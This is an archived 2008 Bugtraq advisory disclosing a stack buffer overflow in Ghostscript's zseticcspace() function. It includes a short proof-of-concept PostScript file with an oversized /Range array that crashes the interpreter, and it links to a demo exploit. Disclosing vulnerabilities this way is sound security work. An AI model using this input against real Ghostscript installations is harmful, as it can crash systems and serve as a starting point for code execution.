| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <72daeffd0802281457j33415c98mb01a558e77235f4@mail.gmail.com> Date: Thu, 28 Feb 2008 14:57:42 -0800 From: "Chris Evans" <scarybeasts@...il.com> To: bugtraq@...urityfocus.com Subject: Ghostscript buffer overflow Hi, Buffer overflow in Ghostscript. A useful attack vector because a lot of UNIX workstations will put PS files on the web through Ghostscript. The problem is a stack-based buffer overflow in the zseticcspace() function in zicc.c. The issue is over-trust of the length of a postscript array which an attacker can set to an arbitrary length. One slight amusement is that the overflowed type is "float", leading to machine code -> float conversion in any exploit. An example .ps file to trigger a crash follows: %!PS-Adobe-2.0 << /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace Announcement: http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html Full technical details including a demo exploit by my colleague Will Drewry: http://scary.beasts.org/security/CESA-2008-001.html Cheers Chris
Powered by blists - more mailing lists